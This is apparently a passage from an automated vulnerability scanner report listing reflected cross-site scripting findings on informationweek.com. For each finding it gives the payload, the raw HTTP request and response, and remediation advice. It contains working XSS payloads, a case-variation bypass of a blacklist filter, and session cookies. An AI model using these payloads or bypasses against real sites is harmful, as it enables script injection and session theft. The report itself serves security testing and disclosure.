<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/videoe638a"><ScRiPt>alert(1)</ScRiPt>e7ef98dc374/security/;kvarticleid=;kvauthor=;loc=300;grp=5636359" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b758'-alert(1)-'7ead8886ea5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security2b758'-alert(1)-'7ead8886ea5/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:02 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:02 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 96682
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security2b758'-alert(1)-'7ead8886ea5/21090964001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=331726376;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d0af"%20a%3db%20286b604eb55 was submitted in the REST URL parameter 3. This input was echoed as 5d0af" a=b 286b604eb55 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/210909640015d0af"%20a%3db%20286b604eb55 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30621
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/210909640015d0af" a=b 286b604eb55;kvarticleid=;kvauthor=;loc=300;grp=228968474" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cb55'-alert(1)-'aa5bdd84f43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/210909640018cb55'-alert(1)-'aa5bdd84f43 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:14 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:14 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30661
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/210909640018cb55'-alert(1)-'aa5bdd84f43;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=797050225;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f27cb</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1670a804718 was submitted in the REST URL parameter 1. This input was echoed as f27cb</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1670a804718 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /videof27cb</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1670a804718/security/37740285001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:14 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:14 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30793
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/videof27cb</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1670a804718/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=641034546;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26018"style%3d"x%3aexpression(alert(1))"f2a6b5d5f24 was submitted in the REST URL parameter 2. This input was echoed as 26018"style="x:expression(alert(1))"f2a6b5d5f24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/security26018"style%3d"x%3aexpression(alert(1))"f2a6b5d5f24/37740285001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:19 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:19 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 96545
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <input type="hidden" name="sectionLowerCase" value="security26018"style="x:expression(alert(1))"f2a6b5d5f24"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54b16</ScRiPt%20>711d777804b was submitted in the REST URL parameter 2. This input was echoed as 54b16</ScRiPt >711d777804b in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /video/security54b16</ScRiPt%20>711d777804b/37740285001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:28 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:28 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97271
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security54b16</ScRiPt >711d777804b/37740285001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=257170897;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804f9"%20a%3db%20ac2704b38a4 was submitted in the REST URL parameter 3. This input was echoed as 804f9" a=b ac2704b38a4 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/37740285001804f9"%20a%3db%20ac2704b38a4 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:34 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:34 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30621
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/37740285001804f9" a=b ac2704b38a4;kvarticleid=;kvauthor=;loc=300;grp=889498791" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 709c9'-alert(1)-'61eb43f1486 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video709c9'-alert(1)-'61eb43f1486/security/42988833001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30697
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video709c9'-alert(1)-'61eb43f1486/security/42988833001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=328210704;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4a1e'-alert(1)-'655f1d8d90e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/42988833001c4a1e'-alert(1)-'655f1d8d90e HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:04 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:04 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30661
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/42988833001c4a1e'-alert(1)-'655f1d8d90e;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=689735227;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e283"><a>7b71d6d94d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/429888330018e283"><a>7b71d6d94d4 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:58 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:58 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30621
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/429888330018e283"><a>7b71d6d94d4;kvarticleid=;kvauthor=;loc=300;grp=653753543" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1772f'-alert(1)-'998ddc2136e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video1772f'-alert(1)-'998ddc2136e/security/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:53 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:53 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30697
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video1772f'-alert(1)-'998ddc2136e/security/44865844001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=181081857;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 772ec"><x%20style%3dx%3aexpression(alert(1))>35d6f7ef7e3 was submitted in the REST URL parameter 1. This input was echoed as 772ec"><x style=x:expression(alert(1))>35d6f7ef7e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video772ec"><x%20style%3dx%3aexpression(alert(1))>35d6f7ef7e3/security/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:51 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:51 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30835
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video772ec"><x style=x:expression(alert(1))>35d6f7ef7e3/se;kvarticleid=;kvauthor=;loc=300;grp=464449422" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4106b"><script>alert(1)</script>0f726ca262d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/security4106b"><script>alert(1)</script>0f726ca262d/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:00 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:00 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97734
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=security+/video/security4106b"><script>alert(1)</script>0f726ca262d/;kvarticleid=;kvauthor=;loc=300;grp=874214663" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ecdc</script><a%20b%3dc>3b4bf73d484 was submitted in the REST URL parameter 2. This input was echoed as 7ecdc</script><a b=c>3b4bf73d484 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security7ecdc</script><a%20b%3dc>3b4bf73d484/44865844001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
